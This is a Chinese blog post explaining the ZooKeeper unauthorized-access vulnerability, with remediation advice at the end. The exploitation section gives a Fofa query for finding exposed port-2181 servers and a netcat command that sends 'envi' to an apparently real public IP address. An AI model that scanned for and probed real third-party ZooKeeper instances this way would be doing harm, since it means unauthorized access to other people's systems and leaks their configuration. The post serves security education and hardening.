Zookeeper未授权访问漏洞

starhei.zxy2024-08-05 17:35

Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息....

复制代码 
port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试..

复制代码 
echo envi | nc 106.227.19.24 2181

步骤三:可使用Zookeeper可视化管理工具进行连接....

复制代码 
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

漏洞修复

  1. 修改 ZooKeeper 默认端口,采用其他端口服务。
  2. 添加访问控制,配置服务来源地址限制策略。
  3. 增加 ZooKeeper 的认证配置。
相关推荐
群联云防护小杜2 小时前
云服务器主动防御策略与自动化防护(下)
运维·服务器·分布式·安全·自动化·音视频
TE-茶叶蛋4 小时前
秒杀压测计划 + Kafka 分区设计参考
分布式·kafka
repetitiononeoneday5 小时前
云原生课程-Docker
云原生
KubeSphere 云原生5 小时前
云原生周刊:Kubernetes v1.33 正式发布
云原生·容器·kubernetes
南 阳5 小时前
从微服务到AI服务:Nacos 3.0如何重构下一代动态治理体系?
人工智能·微服务·云原生·重构
青铜爱码士7 小时前
redis+lua+固定窗口实现分布式限流
redis·分布式·lua
阿里云云原生8 小时前
对比测评:为什么AI编程工具需要 Rules 能力?
云原生
啊喜拔牙9 小时前
如何搭建spark yarn模式的集群
大数据·分布式·spark
听雨·眠9 小时前
关于kafka
分布式·kafka·消息队列
TE-茶叶蛋9 小时前
NestJS + Kafka 秒杀系统完整实践总结
分布式·kafka
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03西电B测-计算机网络综合实验(含验收问题)04Coze扣子平台完整体验和实践(附国内和国际版对比)05YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】06DeepSeek各版本说明与优缺点分析07Python基于Flask的豆瓣电影数据分析可视化系统(附源码,文档说明)08yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记09我决定放弃搞 Java 了10最新 Kubernetes 集群部署 + flannel 网络插件(保姆级教程,最新 K8S 版本)